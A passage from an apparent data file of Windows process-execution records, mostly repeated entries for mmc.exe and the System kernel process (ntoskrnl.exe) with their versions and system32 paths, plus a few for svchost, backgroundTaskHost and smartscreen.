System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='smartscreen', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/smartscreen.exe', 'smartscreen'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 